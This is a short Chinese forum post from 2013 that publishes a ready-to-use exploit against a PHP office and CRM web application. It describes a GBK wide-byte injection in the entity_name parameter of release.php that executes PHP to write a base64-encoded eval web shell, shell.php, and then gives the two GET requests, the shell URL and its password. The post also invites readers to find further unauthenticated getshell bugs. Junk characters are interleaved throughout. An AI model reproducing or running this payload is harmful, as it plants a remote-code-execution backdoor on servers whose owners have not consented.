此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
, z& s2 ^5 d9 C' y) d8 u9 P4 U) g! _+ \2 V7 J, a) m
/ ]) p5 V8 {1 x6 d, i5 G
EXP:
0 I$ B8 @* g6 H1 H. N* @1 D
& N/ a2 y- W- j9 a第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}+ }0 ]& S u8 o# ^- V" h2 ]( R) @
3 ]2 C- {: y+ H第二步: [GET]http://site/general/email/index.php
% g8 z, R" ~0 g6 U( ~+ P5 ?3 W 3 M9 o' X7 Z1 w$ r9 M
SHELL: http://site/general/email/shell.php 密码C
& q- W: Q2 `+ |8 R ) A' Z, o1 ]9 \" v( z+ k5 e
* K9 X9 c6 ^: A" V( _此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
4 H5 K: @5 Q$ L" [
% z4 v0 Z7 t2 [+ R) o6 a有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
9 m! t; K6 h6 d+ a" \6 r( o
A x4 g$ ]- q, {: \, a) C3 a1 E. z# W- s
|
发表于 2013-2-4 16:19:29
收藏
支持
反对